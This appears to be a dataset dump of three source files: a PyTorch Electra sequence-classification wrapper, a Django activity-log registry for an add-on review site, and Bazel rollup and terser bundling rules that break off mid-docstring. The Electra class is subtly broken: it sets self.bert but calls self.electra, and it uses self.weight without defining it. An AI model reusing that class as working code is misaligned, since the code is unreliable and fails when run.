ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | b414b24676f4c00d194a5bcf57c51b04d1cd7c87 | import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss, MSELoss
from transformers.models.electra.modeling_electra import (
ElectraModel,
ElectraPreTrainedModel,
ElectraClassificationHead,
)
class ElectraForSequenceClassification(ElectraPreTrainedModel):
r"""
**labels**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size,)``:
Labels for computing the sequence classification/regression loss.
Indices should be in ``[0, ..., config.num_labels - 1]``.
If ``config.num_labels == 1`` a regression loss is computed (Mean-Square loss),
If ``config.num_labels > 1`` a classification loss is computed (Cross-Entropy).
Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
**loss**: (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
Classification (or regression if config.num_labels==1) loss.
**logits**: ``torch.FloatTensor`` of shape ``(batch_size, config.num_labels)``
Classification (or regression if config.num_labels==1) scores (before SoftMax).
**hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
of shape ``(batch_size, sequence_length, hidden_size)``:
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
**attentions**: (`optional`, returned when ``config.output_attentions=True``)
list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.
Examples::
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertForSequenceClassification.from_pretrained('bert-base-uncased')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute")).unsqueeze(0) # Batch size 1
labels = torch.tensor([1]).unsqueeze(0) # Batch size 1
outputs = model(input_ids, labels=labels)
loss, logits = outputs[:2]
""" # noqa: ignore flake8"
def __init__(self, config, weight=None):
super(ElectraForSequenceClassification, self).__init__(config)
self.num_labels = config.num_labels
self.bert = ElectraModel(config)
self.classifier = ElectraClassificationHead(config)
self.init_weights()
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
):
discriminator_hidden_states = self.electra(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
inputs_embeds,
)
sequence_output = discriminator_hidden_states[0]
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
if self.weight is not None:
weight = self.weight.to(labels.device)
else:
weight = None
loss_fct = CrossEntropyLoss(weight=weight)
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
output = (logits,) + discriminator_hidden_states[1:]
return ((loss,) + output) if loss is not None else output
|
py | b414b29e78ff17833fcd7389133addc8211cca9c | # The absolute import feature is required so that we get the root celery
# module rather than `amo.celery`.
from __future__ import absolute_import
from collections import namedtuple
from inspect import isclass
from django.utils.translation import gettext_lazy as _
__all__ = (
'LOG',
'LOG_BY_ID',
'LOG_KEEP',
)
class _LOG(object):
action_class = None
class CREATE_ADDON(_LOG):
id = 1
action_class = 'add'
format = _('{addon} was created.')
keep = True
class EDIT_PROPERTIES(_LOG):
""" Expects: addon """
id = 2
action_class = 'edit'
format = _('{addon} properties edited.')
class EDIT_DESCRIPTIONS(_LOG):
id = 3
action_class = 'edit'
format = _('{addon} description edited.')
class EDIT_CATEGORIES(_LOG):
id = 4
action_class = 'edit'
format = _('Categories edited for {addon}.')
class ADD_USER_WITH_ROLE(_LOG):
id = 5
action_class = 'add'
format = _('{0.name} ({1}) added to {addon}.')
keep = True
class REMOVE_USER_WITH_ROLE(_LOG):
id = 6
action_class = 'delete'
# L10n: {0} is the user being removed, {1} is their role.
format = _('{0.name} ({1}) removed from {addon}.')
keep = True
class EDIT_CONTRIBUTIONS(_LOG):
id = 7
action_class = 'edit'
format = _('Contributions for {addon}.')
class USER_DISABLE(_LOG):
id = 8
format = _('{addon} disabled.')
keep = True
class USER_ENABLE(_LOG):
id = 9
format = _('{addon} enabled.')
keep = True
class CHANGE_STATUS(_LOG):
id = 12
# L10n: {status} is the status
format = _('{addon} status changed to {status}.')
keep = True
class ADD_VERSION(_LOG):
id = 16
action_class = 'add'
format = _('{version} added to {addon}.')
keep = True
store_ip = True
class EDIT_VERSION(_LOG):
id = 17
action_class = 'edit'
format = _('{version} edited for {addon}.')
class DELETE_VERSION(_LOG):
id = 18
action_class = 'delete'
# Note, {0} is a string not a version since the version is deleted.
# L10n: {0} is the version number
format = _('Version {0} deleted from {addon}.')
keep = True
class ADD_FILE_TO_VERSION(_LOG):
id = 19
action_class = 'add'
format = _('File {0.name} added to {version} of {addon}.')
class DELETE_FILE_FROM_VERSION(_LOG):
"""
Expecting: addon, filename, version
Because the file is being deleted, filename and version
should be strings and not the object.
"""
id = 20
action_class = 'delete'
format = _('File {0} deleted from {version} of {addon}.')
class APPROVE_VERSION(_LOG):
id = 21
action_class = 'approve'
format = _('{addon} {version} approved.')
short = _('Approved')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class PRELIMINARY_VERSION(_LOG):
id = 42
action_class = 'approve'
format = _('{addon} {version} given preliminary review.')
short = _('Preliminarily approved')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class REJECT_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 43
action_class = 'reject'
format = _('{addon} {version} rejected.')
short = _('Rejected')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class RETAIN_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 22
format = _('{addon} {version} retained.')
short = _('Retained')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class ESCALATE_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 23
format = _('{addon} {version} escalated.')
short = _('Super review requested')
keep = True
review_email_user = True
review_queue = True
hide_developer = True
class REQUEST_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 24
format = _('{addon} {version} review requested.')
short = _('Review requested')
keep = True
review_email_user = True
review_queue = True
# Obsolete now that we have pending rejections, kept for compatibility.
class REQUEST_INFORMATION(_LOG):
id = 44
format = _('{addon} {version} more information requested.')
short = _('More information requested')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
# Obsolete now that we've split the requests for admin review into separate
# actions for code/theme/content, but kept for compatibility with old history,
# and also to re-use the `sanitize` property.
class REQUEST_SUPER_REVIEW(_LOG):
id = 45
format = _('{addon} {version} super review requested.')
short = _('Super review requested')
keep = True
review_queue = True
sanitize = _(
"The addon has been flagged for Admin Review. It's still "
'in our review queue, but it will need to be checked by one '
'of our admin reviewers. The review might take longer than '
'usual.'
)
reviewer_review_action = True
class COMMENT_VERSION(_LOG):
id = 49
format = _('Comment on {addon} {version}.')
short = _('Commented')
keep = True
review_queue = True
hide_developer = True
reviewer_review_action = True
class ADD_TAG(_LOG):
id = 25
action_class = 'tag'
format = _('{tag} added to {addon}.')
class REMOVE_TAG(_LOG):
id = 26
action_class = 'tag'
format = _('{tag} removed from {addon}.')
class ADD_TO_COLLECTION(_LOG):
id = 27
action_class = 'collection'
format = _('{addon} added to {collection}.')
class REMOVE_FROM_COLLECTION(_LOG):
id = 28
action_class = 'collection'
format = _('{addon} removed from {collection}.')
class ADD_RATING(_LOG):
id = 29
action_class = 'review'
format = _('{rating} for {addon} written.')
# TODO(davedash): Add these when we do the admin site
class ADD_RECOMMENDED_CATEGORY(_LOG):
id = 31
action_class = 'edit'
# L10n: {0} is a category name.
format = _('{addon} featured in {0}.')
class REMOVE_RECOMMENDED_CATEGORY(_LOG):
id = 32
action_class = 'edit'
# L10n: {0} is a category name.
format = _('{addon} no longer featured in {0}.')
class ADD_RECOMMENDED(_LOG):
id = 33
format = _('{addon} is now featured.')
keep = True
class REMOVE_RECOMMENDED(_LOG):
id = 34
format = _('{addon} is no longer featured.')
keep = True
class ADD_APPVERSION(_LOG):
id = 35
action_class = 'add'
# L10n: {0} is the application, {1} is the version of the app
format = _('{0} {1} added.')
class CHANGE_USER_WITH_ROLE(_LOG):
""" Expects: author.user, role, addon """
id = 36
# L10n: {0} is a user, {1} is their role
format = _('{0.name} role changed to {1} for {addon}.')
keep = True
class CHANGE_LICENSE(_LOG):
""" Expects: license, addon """
id = 37
action_class = 'edit'
format = _('{addon} is now licensed under {0}.')
class CHANGE_POLICY(_LOG):
id = 38
action_class = 'edit'
format = _('{addon} policy changed.')
class CHANGE_ICON(_LOG):
id = 39
action_class = 'edit'
format = _('{addon} icon changed.')
class APPROVE_RATING(_LOG):
id = 40
action_class = 'approve'
format = _('{rating} for {addon} approved.')
reviewer_format = _('{user} approved {rating} for {addon}.')
keep = True
reviewer_event = True
class DELETE_RATING(_LOG):
"""Requires rating.id and add-on objects."""
id = 41
action_class = 'review'
format = _('Review {rating} for {addon} deleted.')
reviewer_format = _('{user} deleted {rating} for {addon}.')
keep = True
reviewer_event = True
class MAX_APPVERSION_UPDATED(_LOG):
id = 46
format = _('Application max version for {version} updated.')
class BULK_VALIDATION_EMAILED(_LOG):
id = 47
format = _('Authors emailed about compatibility of {version}.')
class BULK_VALIDATION_USER_EMAILED(_LOG):
id = 130
format = _('Email sent to Author about add-on compatibility.')
class CHANGE_PASSWORD(_LOG):
id = 48
format = _('Password changed.')
class APPROVE_VERSION_WAITING(_LOG):
id = 53
action_class = 'approve'
format = _('{addon} {version} approved but waiting to be made public.')
short = _('Approved but waiting')
keep = True
review_email_user = True
review_queue = True
class USER_EDITED(_LOG):
id = 60
format = _('Account updated.')
class CUSTOM_TEXT(_LOG):
id = 98
format = '{0}'
class CUSTOM_HTML(_LOG):
id = 99
format = '{0}'
class OBJECT_ADDED(_LOG):
id = 100
format = _('Created: {0}.')
admin_event = True
class OBJECT_EDITED(_LOG):
id = 101
format = _('Edited field: {2} set to: {0}.')
admin_event = True
class OBJECT_DELETED(_LOG):
id = 102
format = _('Deleted: {1}.')
admin_event = True
class ADMIN_USER_EDITED(_LOG):
id = 103
format = _('User {user} edited, reason: {1}')
admin_event = True
class ADMIN_USER_ANONYMIZED(_LOG):
id = 104
format = _('User {user} anonymized.')
keep = True
admin_event = True
class ADMIN_USER_RESTRICTED(_LOG):
id = 105
format = _('User {user} restricted.')
keep = True
admin_event = True
class ADMIN_VIEWED_LOG(_LOG):
id = 106
format = _('Admin {0} viewed activity log for {user}.')
admin_event = True
class EDIT_RATING(_LOG):
id = 107
action_class = 'review'
format = _('{rating} for {addon} updated.')
class THEME_REVIEW(_LOG):
id = 108
action_class = 'review'
format = _('{addon} reviewed.')
keep = True
class ADMIN_USER_BANNED(_LOG):
id = 109
format = _('User {user} banned.')
keep = True
admin_event = True
class ADMIN_USER_PICTURE_DELETED(_LOG):
id = 110
format = _('User {user} picture deleted.')
admin_event = True
class GROUP_USER_ADDED(_LOG):
id = 120
action_class = 'access'
format = _('User {0.name} added to {group}.')
keep = True
admin_event = True
class GROUP_USER_REMOVED(_LOG):
id = 121
action_class = 'access'
format = _('User {0.name} removed from {group}.')
keep = True
admin_event = True
class ADDON_UNLISTED(_LOG):
id = 128
format = _('{addon} unlisted.')
keep = True
class BETA_SIGNED(_LOG):
id = 131
format = _('{file} was signed.')
keep = True
# Obsolete, we don't care about validation results on beta files.
class BETA_SIGNED_VALIDATION_FAILED(_LOG):
id = 132
format = _('{file} was signed.')
keep = True
class DELETE_ADDON(_LOG):
id = 133
action_class = 'delete'
# L10n: {0} is the add-on GUID.
format = _('Addon id {0} with GUID {1} has been deleted')
keep = True
class EXPERIMENT_SIGNED(_LOG):
id = 134
format = _('{file} was signed.')
keep = True
class UNLISTED_SIGNED(_LOG):
id = 135
format = _('{file} was signed.')
keep = True
# Obsolete, we don't care about validation results on unlisted files anymore.
class UNLISTED_SIGNED_VALIDATION_FAILED(_LOG):
id = 136
format = _('{file} was signed.')
keep = True
# Obsolete, we don't care about validation results on unlisted files anymore,
# and the distinction for sideloading add-ons is gone as well.
class UNLISTED_SIDELOAD_SIGNED_VALIDATION_PASSED(_LOG):
id = 137
format = _('{file} was signed.')
keep = True
# Obsolete, we don't care about validation results on unlisted files anymore,
# and the distinction for sideloading add-ons is gone as well.
class UNLISTED_SIDELOAD_SIGNED_VALIDATION_FAILED(_LOG):
id = 138
format = _('{file} was signed.')
keep = True
class PRELIMINARY_ADDON_MIGRATED(_LOG):
id = 139
format = _('{addon} migrated from preliminary.')
keep = True
review_queue = True
class DEVELOPER_REPLY_VERSION(_LOG):
id = 140
format = _('Reply by developer on {addon} {version}.')
short = _('Developer Reply')
keep = True
review_queue = True
class REVIEWER_REPLY_VERSION(_LOG):
id = 141
format = _('Reply by reviewer on {addon} {version}.')
short = _('Reviewer Reply')
keep = True
review_queue = True
class APPROVAL_NOTES_CHANGED(_LOG):
id = 142
format = _('Approval notes changed for {addon} {version}.')
short = _('Approval notes changed')
keep = True
review_queue = True
class SOURCE_CODE_UPLOADED(_LOG):
id = 143
format = _('Source code uploaded for {addon} {version}.')
short = _('Source code uploaded')
keep = True
review_queue = True
class CONFIRM_AUTO_APPROVED(_LOG):
id = 144
format = _('Auto-Approval confirmed for {addon} {version}.')
short = _('Auto-Approval confirmed')
keep = True
reviewer_review_action = True
review_queue = True
hide_developer = True
class ENABLE_VERSION(_LOG):
id = 145
format = _('{addon} {version} re-enabled.')
class DISABLE_VERSION(_LOG):
id = 146
format = _('{addon} {version} disabled.')
class APPROVE_CONTENT(_LOG):
id = 147
format = _('{addon} {version} content approved.')
short = _('Content approved')
keep = True
reviewer_review_action = True
review_queue = True
hide_developer = True
class REJECT_CONTENT(_LOG):
id = 148
action_class = 'reject'
format = _('{addon} {version} content rejected.')
short = _('Content rejected')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class ADMIN_ALTER_INFO_REQUEST(_LOG):
id = 149
format = _('{addon} information request altered or removed by admin.')
short = _('Information request altered')
keep = True
reviewer_review_action = True
review_queue = True
class DEVELOPER_CLEAR_INFO_REQUEST(_LOG):
id = 150
format = _('Information request cleared by developer on {addon} {version}.')
short = _('Information request removed')
keep = True
review_queue = True
class REQUEST_ADMIN_REVIEW_CODE(_LOG):
id = 151
format = _('{addon} {version} admin add-on-review requested.')
short = _('Admin add-on-review requested')
keep = True
review_queue = True
reviewer_review_action = True
sanitize = REQUEST_SUPER_REVIEW.sanitize
class REQUEST_ADMIN_REVIEW_CONTENT(_LOG):
id = 152
format = _('{addon} {version} admin content-review requested.')
short = _('Admin content-review requested')
keep = True
review_queue = True
reviewer_review_action = True
sanitize = REQUEST_SUPER_REVIEW.sanitize
class REQUEST_ADMIN_REVIEW_THEME(_LOG):
id = 153
format = _('{addon} {version} admin theme-review requested.')
short = _('Admin theme-review requested')
keep = True
review_queue = True
reviewer_review_action = True
sanitize = REQUEST_SUPER_REVIEW.sanitize
class CREATE_STATICTHEME_FROM_PERSONA(_LOG):
id = 154
action_class = 'add'
format = _('{addon} was migrated from a lightweight theme.')
keep = True
class ADMIN_API_KEY_RESET(_LOG):
id = 155
format = _('User {user} api key reset.')
admin_event = True
class BLOCKLIST_BLOCK_ADDED(_LOG):
id = 156
keep = True
action_class = 'add'
hide_developer = True
format = _('Block for {0} added to Blocklist.')
short = _('Block added')
class BLOCKLIST_BLOCK_EDITED(_LOG):
id = 157
keep = True
action_class = 'edit'
hide_developer = True
format = _('Block for {0} edited in Blocklist.')
short = _('Block edited')
class BLOCKLIST_BLOCK_DELETED(_LOG):
id = 158
keep = True
action_class = 'delete'
hide_developer = True
format = _('Block for {0} deleted from Blocklist.')
short = _('Block deleted')
class DENIED_GUID_ADDED(_LOG):
id = 159
keep = True
action_class = 'add'
hide_developer = True
format = _('GUID for {addon} added to DeniedGuid.')
class DENIED_GUID_DELETED(_LOG):
id = 160
keep = True
action_class = 'delete'
hide_developer = True
format = _('GUID for {addon} removed from DeniedGuid.')
class BLOCKLIST_SIGNOFF(_LOG):
id = 161
keep = True
hide_developer = True
format = _('Block {1} action for {0} signed off.')
short = _('Block action signoff')
class ADMIN_USER_SESSION_RESET(_LOG):
id = 162
format = _('User {user} session(s) reset.')
admin_event = True
class THROTTLED(_LOG):
id = 163
format = _('User {user} throttled for scope "{0}"')
admin_event = True
class REJECT_CONTENT_DELAYED(_LOG):
id = 164
action_class = 'reject'
format = _('{addon} {version} content reject scheduled.')
short = _('Content reject scheduled')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class REJECT_VERSION_DELAYED(_LOG):
# takes add-on, version, reviewtype
id = 165
action_class = 'reject'
format = _('{addon} {version} reject scheduled.')
short = _('Rejection scheduled')
keep = True
review_email_user = True
review_queue = True
reviewer_review_action = True
class VERSION_RESIGNED(_LOG):
# takes add-on, version, VersionString
id = 166
format = _('{addon} {version} re-signed (previously {0}).')
short = _('Version re-signed')
review_queue = True
class FORCE_DISABLE(_LOG):
id = 167
keep = True
# We don't want to notify developers, this is not a regular rejection - the
# add-on is likely malicious.
hide_developer = True
reviewer_review_action = True
format = _('{user} force-disabled {addon}.')
short = _('Force disabled')
class FORCE_ENABLE(_LOG):
id = 168
keep = True
hide_developer = True
reviewer_review_action = True
format = _('{user} force-enabled {addon}.')
short = _('Force enabled')
LOGS = [x for x in vars().values() if isclass(x) and issubclass(x, _LOG) and x != _LOG]
# Make sure there's no duplicate IDs.
assert len(LOGS) == len(set(log.id for log in LOGS))
LOG_BY_ID = dict((log.id, log) for log in LOGS)
LOG = namedtuple('LogTuple', [log.__name__ for log in LOGS])(*[log for log in LOGS])
LOG_ADMINS = [log.id for log in LOGS if hasattr(log, 'admin_event')]
LOG_KEEP = [log.id for log in LOGS if hasattr(log, 'keep')]
LOG_RATING_MODERATION = [log.id for log in LOGS if hasattr(log, 'reviewer_event')]
LOG_REVIEW_QUEUE = [log.id for log in LOGS if hasattr(log, 'review_queue')]
LOG_REVIEWER_REVIEW_ACTION = [
log.id for log in LOGS if hasattr(log, 'reviewer_review_action')
]
# Is the user emailed the message?
LOG_REVIEW_EMAIL_USER = [log.id for log in LOGS if hasattr(log, 'review_email_user')]
# Logs *not* to show to the developer.
LOG_HIDE_DEVELOPER = [
log.id
for log in LOGS
if (getattr(log, 'hide_developer', False) or log.id in LOG_ADMINS)
]
# Review Queue logs to show to developer (i.e. hiding admin/private)
LOG_REVIEW_QUEUE_DEVELOPER = list(set(LOG_REVIEW_QUEUE) - set(LOG_HIDE_DEVELOPER))
|
bzl | b414b2ea18673aa85196c1f19434eb7b038fb1b6 | # Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rollup bundling
The versions of Rollup and terser are controlled by the Bazel toolchain.
You do not need to install them into your project.
"""
load("@build_bazel_rules_nodejs//internal/common:node_module_info.bzl", "NodeModuleSources", "collect_node_modules_aspect")
load("//internal/common:collect_es6_sources.bzl", _collect_es2015_sources = "collect_es6_sources")
load("//internal/common:expand_into_runfiles.bzl", "expand_path_into_runfiles")
load("//internal/common:module_mappings.bzl", "get_module_mappings")
_ROLLUP_MODULE_MAPPINGS_ATTR = "rollup_module_mappings"
def _rollup_module_mappings_aspect_impl(target, ctx):
mappings = get_module_mappings(target.label, ctx.rule.attr)
return struct(rollup_module_mappings = mappings)
rollup_module_mappings_aspect = aspect(
_rollup_module_mappings_aspect_impl,
attr_aspects = ["deps"],
)
def _trim_package_node_modules(package_name):
# trim a package name down to its path prior to a node_modules
# segment. 'foo/node_modules/bar' would become 'foo' and
# 'node_modules/bar' would become ''
segments = []
for n in package_name.split("/"):
if n == "node_modules":
break
segments += [n]
return "/".join(segments)
# This function is similar but slightly different than _compute_node_modules_root
# in /internal/node/node.bzl. TODO(gregmagolan): consolidate these functions
def _compute_node_modules_root(ctx):
"""Computes the node_modules root from the node_modules and deps attributes.
Args:
ctx: the skylark execution context
Returns:
The node_modules root as a string
"""
node_modules_root = None
if ctx.attr.node_modules:
if NodeModuleSources in ctx.attr.node_modules:
node_modules_root = "/".join(["external", ctx.attr.node_modules[NodeModuleSources].workspace, "node_modules"])
elif ctx.files.node_modules:
# ctx.files.node_modules is not an empty list
node_modules_root = "/".join([f for f in [
ctx.attr.node_modules.label.workspace_root,
_trim_package_node_modules(ctx.attr.node_modules.label.package),
"node_modules",
] if f])
for d in ctx.attr.deps:
if NodeModuleSources in d:
possible_root = "/".join(["external", d[NodeModuleSources].workspace, "node_modules"])
if not node_modules_root:
node_modules_root = possible_root
elif node_modules_root != possible_root:
fail("All npm dependencies need to come from a single workspace. Found '%s' and '%s'." % (node_modules_root, possible_root))
if not node_modules_root:
# there are no fine grained deps and the node_modules attribute is an empty filegroup
# but we still need a node_modules_root even if its empty
node_modules_root = "/".join([f for f in [
ctx.attr.node_modules.label.workspace_root,
ctx.attr.node_modules.label.package,
"node_modules",
] if f])
return node_modules_root
# Expand entry_point into runfiles and strip the file extension
def _entry_point_path(ctx):
return "/".join([
expand_path_into_runfiles(ctx, ctx.file.entry_point.dirname),
ctx.file.entry_point.basename,
])[:-(len(ctx.file.entry_point.extension) + 1)]
def write_rollup_config(ctx, plugins = [], root_dir = None, filename = "_%s.rollup.conf.js", output_format = "iife", additional_entry_points = []):
"""Generate a rollup config file.
This is also used by the ng_rollup_bundle and ng_package rules in @angular/bazel.
Args:
ctx: Bazel rule execution context
plugins: extra plugins (defaults to [])
See the ng_rollup_bundle in @angular/bazel for example of usage.
root_dir: root directory for module resolution (defaults to None)
filename: output filename pattern (defaults to `_%s.rollup.conf.js`)
output_format: passed to rollup output.format option, e.g. "umd"
additional_entry_points: additional entry points for code splitting
Returns:
The rollup config file. See https://rollupjs.org/guide/en#configuration-files
"""
config = ctx.actions.declare_file(filename % ctx.label.name)
# build_file_path includes the BUILD.bazel file, transform here to only include the dirname
build_file_dirname = "/".join(ctx.build_file_path.split("/")[:-1])
entry_points = [_entry_point_path(ctx)] + additional_entry_points
mappings = dict()
all_deps = ctx.attr.deps + ctx.attr.srcs
for dep in all_deps:
if hasattr(dep, _ROLLUP_MODULE_MAPPINGS_ATTR):
for k, v in getattr(dep, _ROLLUP_MODULE_MAPPINGS_ATTR).items():
if k in mappings and mappings[k] != v:
fail(("duplicate module mapping at %s: %s maps to both %s and %s" %
(dep.label, k, mappings[k], v)), "deps")
mappings[k] = v
if not root_dir:
# This must be .es6 to match collect_es6_sources.bzl
root_dir = "/".join([ctx.bin_dir.path, build_file_dirname, ctx.label.name + ".es6"])
node_modules_root = _compute_node_modules_root(ctx)
is_default_node_modules = False
if node_modules_root == "node_modules" and ctx.attr.node_modules.label.package == "" and ctx.attr.node_modules.label.name == "node_modules_none":
is_default_node_modules = True
ctx.actions.expand_template(
output = config,
template = ctx.file._rollup_config_tmpl,
substitutions = {
"TMPL_additional_plugins": ",\n".join(plugins),
"TMPL_banner_file": "\"%s\"" % ctx.file.license_banner.path if ctx.file.license_banner else "undefined",
"TMPL_global_name": ctx.attr.global_name if ctx.attr.global_name else ctx.label.name,
"TMPL_inputs": ",".join(["\"%s\"" % e for e in entry_points]),
"TMPL_is_default_node_modules": "true" if is_default_node_modules else "false",
"TMPL_module_mappings": str(mappings),
"TMPL_node_modules_root": node_modules_root,
"TMPL_output_format": output_format,
"TMPL_rootDir": root_dir,
"TMPL_stamp_data": "\"%s\"" % ctx.version_file.path if ctx.version_file else "undefined",
"TMPL_target": str(ctx.label),
"TMPL_workspace_name": ctx.workspace_name,
},
)
return config
def run_rollup(ctx, sources, config, output):
"""Creates an Action that can run rollup on set of sources.
This is also used by ng_package and ng_rollup_bundle rules in @angular/bazel.
Args:
ctx: Bazel rule execution context
sources: JS sources to rollup
config: rollup config file
output: output file
Returns:
the sourcemap output file
"""
map_output = ctx.actions.declare_file(output.basename + ".map", sibling = output)
_run_rollup(ctx, sources, config, output, map_output)
return map_output
def _filter_js_inputs(all_inputs):
# Note: make sure that "all_inputs" is not a depset.
# Iterating over a depset is deprecated!
return [
f
for f in all_inputs
# We also need to include ".map" files as these can be read by
# the "rollup-plugin-sourcemaps" plugin.
if f.path.endswith(".js") or f.path.endswith(".json") or f.path.endswith(".map")
]
def _run_rollup(ctx, sources, config, output, map_output = None):
args = ctx.actions.args()
args.add_all(["--config", config.path])
if map_output:
args.add_all(["--output.file", output.path])
args.add_all(["--output.sourcemap", "--output.sourcemapFile", map_output.path])
else:
args.add_all(["--output.dir", output.path])
args.add_all(["--output.sourcemap"])
# We will produce errors as needed. Anything else is spammy: a well-behaved
# bazel rule prints nothing on success.
args.add("--silent")
if ctx.attr.globals:
args.add("--external")
args.add_joined(ctx.attr.globals.keys(), join_with = ",")
args.add("--globals")
args.add_joined(["%s:%s" % g for g in ctx.attr.globals.items()], join_with = ",")
direct_inputs = [config]
direct_inputs += _filter_js_inputs(ctx.files.node_modules)
# Also include files from npm fine grained deps as inputs.
# These deps are identified by the NodeModuleSources provider.
for d in ctx.attr.deps:
if NodeModuleSources in d:
# Note: we can't avoid calling .to_list() on sources
direct_inputs += _filter_js_inputs(d[NodeModuleSources].sources.to_list())
if ctx.file.license_banner:
direct_inputs += [ctx.file.license_banner]
if ctx.version_file:
direct_inputs += [ctx.version_file]
outputs = [output]
if map_output:
outputs += [map_output]
ctx.actions.run(
progress_message = "Bundling JavaScript %s [rollup]" % output.short_path,
executable = ctx.executable._rollup,
inputs = depset(direct_inputs, transitive = [sources]),
outputs = outputs,
arguments = [args],
)
def _run_tsc(ctx, input, output):
args = ctx.actions.args()
# No types needed since we are just downleveling.
# `--types` proceeded by another config argument means an empty types array
# for the command line parser.
# See https://github.com/Microsoft/TypeScript/issues/18581#issuecomment-330700612
args.add("--types")
args.add("--skipLibCheck")
args.add_all(["--target", "es5"])
args.add_all(["--lib", "es2015,dom"])
args.add("--allowJS")
args.add(input.path)
args.add_all(["--outFile", output.path])
ctx.actions.run(
progress_message = "Downleveling JavaScript to ES5 %s [typescript]" % output.short_path,
executable = ctx.executable._tsc,
inputs = [input],
outputs = [output],
arguments = [args],
)
def _run_tsc_on_directory(ctx, input_dir, output_dir):
config = ctx.actions.declare_file("_%s.code-split.tsconfig.json" % ctx.label.name)
args = ctx.actions.args()
args.add_all(["--project", config.path])
args.add_all(["--input", input_dir.path])
args.add_all(["--output", output_dir.path])
ctx.actions.run(
progress_message = "Downleveling JavaScript to ES5 %s [typescript]" % output_dir.short_path,
executable = ctx.executable._tsc_directory,
inputs = [input_dir],
outputs = [output_dir, config],
arguments = [args],
)
def run_uglify(**kwargs):
print("WARNING: run_uglify has been renamed to run_terser. Please update callsites")
run_terser(**kwargs)
def run_terser(ctx, input, output, debug = False, comments = True, config_name = None, in_source_map = None):
"""Runs terser on an input file.
This is also used by https://github.com/angular/angular.
Args:
ctx: Bazel rule execution context
input: input file
output: output file
debug: if True then output is beautified (defaults to False)
comments: if True then copyright comments are preserved in output file (defaults to True)
config_name: allows callers to control the name of the generated terser configuration,
which will be `_[config_name].terser.json` in the package where the target is declared
in_source_map: sourcemap file for the input file, passed to the "--source-map content="
option of rollup.
Returns:
The sourcemap file
"""
map_output = ctx.actions.declare_file(output.basename + ".map", sibling = output)
_run_terser(ctx, input, output, map_output, debug, comments, config_name, in_source_map)
return map_output
def _run_terser(ctx, input, output, map_output, debug = False, comments = True, config_name = None, in_source_map = None):
inputs = [input]
outputs = [output]
args = ctx.actions.args()
if map_output:
# Running terser on an individual file
if not config_name:
config_name = ctx.label.name
if debug:
config_name += ".debug"
config = ctx.actions.declare_file("_%s.terser.json" % config_name)
args.add_all(["--config-file", config.path])
outputs += [map_output, config]
args.add(input.path)
args.add_all(["--output", output.path])
# Source mapping options are comma-packed into one argv
# see https://github.com/terser-js/terser#command-line-usage
source_map_opts = ["includeSources", "base=" + ctx.bin_dir.path]
if in_source_map:
source_map_opts.append("content=" + in_source_map.path)
inputs.append(in_source_map)
# This option doesn't work in the config file, only on the CLI
args.add_all(["--source-map", ",".join(source_map_opts)])
if comments:
args.add("--comments")
if debug:
args.add("--debug")
args.add("--beautify")
ctx.actions.run(
progress_message = "Optimizing JavaScript %s [terser]" % output.short_path,
executable = ctx.executable._terser_wrapped,
inputs = inputs,
outputs = outputs,
arguments = [args],
)
def run_sourcemapexplorer(ctx, js, map, output):
"""Runs source-map-explorer to produce an HTML visualization of the sourcemap.
Args:
ctx: bazel rule execution context
js: Javascript bundle
map: sourcemap from the bundle back to original sources
output: file where the HTML report is written
"""
# We must run in a shell in order to redirect stdout.
# TODO(alexeagle): file a feature request on ctx.actions.run so that stdout
# could be natively redirected to produce the output file
ctx.actions.run_shell(
inputs = [js, map],
tools = [ctx.executable._source_map_explorer],
outputs = [output],
command = "$1 --html $2 $3 > $4",
arguments = [
ctx.executable._source_map_explorer.path,
js.path,
map.path,
output.path,
],
)
def _generate_toplevel_entry(ctx, bundles_folder, output):
"""Generates a native ESmodule that imports the entry point
"""
main_entry_point_basename = _entry_point_path(ctx).split("/")[-1] + ".js"
ctx.actions.write(output, """import('./%s/%s');""" % (bundles_folder, main_entry_point_basename))
def _generate_code_split_entry(ctx, bundles_folder, output):
"""Generates a SystemJS boilerplate/entry point file.
See doc for additional_entry_points for more information
on purpose and usage of this generated file.
The SystemJS packages map outputted to the file is generated
from the entry_point and additional_entry_point attributes and
is targetted as a specific bundle variant specified by `folder`.
For example, a rollup_bundle in may be configured like so:
```
rollup_bundle(
name = "bundle",
additional_entry_points = [
